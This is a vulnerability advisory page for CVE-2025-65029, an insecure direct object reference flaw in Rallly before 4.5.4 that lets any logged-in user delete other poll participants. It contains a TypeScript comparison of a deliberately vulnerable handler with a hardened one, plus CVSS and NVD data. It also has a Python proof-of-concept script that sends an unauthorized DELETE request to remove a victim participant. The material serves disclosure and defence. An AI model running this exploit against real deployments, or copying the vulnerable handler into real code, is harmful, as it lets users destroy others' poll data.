Security Vulnerability Report
CVE-2025-65029 CVSS 8.1 HIGH

CVE-2025-65029

Published: 2025-11-19 18:15:50
Last Modified: 2025-11-25 15:33:17

Description

Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an insecure direct object reference (IDOR) vulnerability allows any authenticated user to delete arbitrary participants from polls without ownership verification. The endpoint relies solely on a participant ID to authorize deletions, enabling attackers to remove other users (including poll owners) from polls. This impacts the integrity and availability of poll participation data. This issue has been patched in version 4.5.4.
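The flaw described above is a missing object-level authorization check: the handler authenticates the caller but authorizes the delete on the participant ID alone. The following is an added example, not Rallly's own code, written in TypeScript because Rallly is a TypeScript project; the data model, function names and return values are assumptions chosen to show the vulnerable pattern next to a hardened one.

```typescript
// Added illustration of CVE-2025-65029's root cause (missing object-level
// authorization on participant deletion) next to a hardened version.
// Not Rallly's code: the data model, names and return values are assumptions.

type UserId = string;

interface Poll {
  id: string;
  ownerId: UserId;
}

interface Participant {
  id: string;
  pollId: string;
  userId: UserId | null; // null models a participant who answered anonymously
}

type DeleteResult = "deleted" | "unauthenticated" | "forbidden" | "not_found";

class PollStore {
  readonly polls = new Map<string, Poll>();
  readonly participants = new Map<string, Participant>();
}

// Vulnerable pattern: the caller is authenticated (callerId present), but the
// delete is authorized by the participant ID alone, so any logged-in user can
// remove any participant from any poll, including the poll owner.
function deleteParticipantVulnerable(store: PollStore, callerId: UserId | null, participantId: string): DeleteResult {
  if (callerId === null) return "unauthenticated";
  if (!store.participants.has(participantId)) return "not_found";
  store.participants.delete(participantId); // no check that callerId may touch this record
  return "deleted";
}

// Hardened pattern: resolve the participant to its poll and require that the
// caller owns that poll or is the participant themself. Anonymous participants
// have no owning user, so only the poll owner can remove them.
function deleteParticipantHardened(store: PollStore, callerId: UserId | null, participantId: string): DeleteResult {
  if (callerId === null) return "unauthenticated";
  const participant = store.participants.get(participantId);
  if (participant === undefined) return "not_found";
  const poll = store.polls.get(participant.pollId);
  if (poll === undefined) return "not_found";
  const isPollOwner = poll.ownerId === callerId;
  const isSelf = participant.userId !== null && participant.userId === callerId;
  if (!isPollOwner && !isSelf) return "forbidden";
  store.participants.delete(participantId);
  return "deleted";
}

// Constructed scenario (not real data): alice owns poll-1; alice, bob and an
// anonymous respondent are participants; mallory is an unrelated logged-in user.
function buildScenario(): PollStore {
  const store = new PollStore();
  store.polls.set("poll-1", { id: "poll-1", ownerId: "alice" });
  store.participants.set("p-alice", { id: "p-alice", pollId: "poll-1", userId: "alice" });
  store.participants.set("p-bob", { id: "p-bob", pollId: "poll-1", userId: "bob" });
  store.participants.set("p-anon", { id: "p-anon", pollId: "poll-1", userId: null });
  return store;
}

function demo() {
  const vulnerable = buildScenario();
  const hardened = buildScenario();
  return {
    // Pre-4.5.4 behaviour: mallory removes the poll owner's own participation.
    vulnMalloryDeletesOwner: deleteParticipantVulnerable(vulnerable, "mallory", "p-alice"),
    vulnRemaining: vulnerable.participants.size,
    // Hardened behaviour for the same request and related ones.
    hardMalloryDeletesOwner: deleteParticipantHardened(hardened, "mallory", "p-alice"),
    hardMalloryDeletesAnon: deleteParticipantHardened(hardened, "mallory", "p-anon"),
    hardBobDeletesOwner: deleteParticipantHardened(hardened, "bob", "p-alice"),
    hardBobDeletesSelf: deleteParticipantHardened(hardened, "bob", "p-bob"),
    hardOwnerDeletesAnon: deleteParticipantHardened(hardened, "alice", "p-anon"),
    hardUnauthenticated: deleteParticipantHardened(hardened, null, "p-alice"),
    hardUnknownId: deleteParticipantHardened(hardened, "alice", "no-such-id"),
    hardRemaining: hardened.participants.size,
  };
}

console.log(demo());
```

Two practical points when carrying this over to a real HTTP handler: return the same 404 for both "forbidden" and "not_found" so a probing user cannot enumerate which participant IDs exist, and, where the data layer allows it, express the ownership condition in the delete query itself (delete where id matches and the poll's owner is the caller) so the check and the delete cannot be separated by a race.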

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:rallly:rallly:*:*:*:*:*:*:*:* - VULNERABLE
Rallly < 4.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-65029 PoC - Rallly IDOR Vulnerability
# Target: Rallly < 4.5.4
# The endpoint path and bearer-token header below are this PoC's assumptions
# about the target's API, not details confirmed by the advisory text on this
# page; verify them against the target before use.
TARGET_URL = "http://target-server.com"
ATTACKER_TOKEN = "attacker_auth_token_here"
VICTIM_PARTICIPANT_ID = "victim_participant_uuid"
POLL_ID = "target_poll_id"


def delete_participant_idor():
    """
    IDOR exploit: delete an arbitrary participant without ownership verification.
    The vulnerable endpoint only checks authentication, not authorization.
    """
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json",
    }
    # Vulnerable endpoint - no ownership check
    url = f"{TARGET_URL}/api/polls/{POLL_ID}/participants/{VICTIM_PARTICIPANT_ID}"
    response = requests.delete(url, headers=headers, timeout=10)
    # A successful DELETE may be answered with 200 or with 204 (no body)
    if response.status_code in (200, 204):
        print("[+] Successfully deleted victim participant!")
        print(f"[+] Deleted participant ID: {VICTIM_PARTICIPANT_ID}")
    elif response.status_code == 401:
        print("[-] Authentication failed")
    elif response.status_code == 404:
        print("[-] Participant not found")
    else:
        print(f"[-] Request failed with status: {response.status_code}")


if __name__ == "__main__":
    print("CVE-2025-65029 IDOR PoC")
    print("Target: Rallly < 4.5.4")
    delete_participant_idor()

References

https://github.com/lukevella/rallly/releases/tag/v4.5.4 (Release Notes)
https://github.com/lukevella/rallly/security/advisories/GHSA-f8jc-6746-ww95 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65029", "sourceIdentifier": "[email protected]", "published": "2025-11-19T18:15:50.387", "lastModified": "2025-11-25T15:33:17.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an insecure direct object reference (IDOR) vulnerability allows any authenticated user to delete arbitrary participants from polls without ownership verification. The endpoint relies solely on a participant ID to authorize deletions, enabling attackers to remove other users (including poll owners) from polls. This impacts the integrity and availability of poll participation data. This issue has been patched in version 4.5.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}, {"lang": "en", "value": "CWE-639"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rallly:rallly:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.4", "matchCriteriaId": "05349176-CA4D-4360-A7E1-0EA2D8C24E7E"}]}]}], "references": [{"url": "https://github.com/lukevella/rallly/releases/tag/v4.5.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/lukevella/rallly/security/advisories/GHSA-f8jc-6746-ww95", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}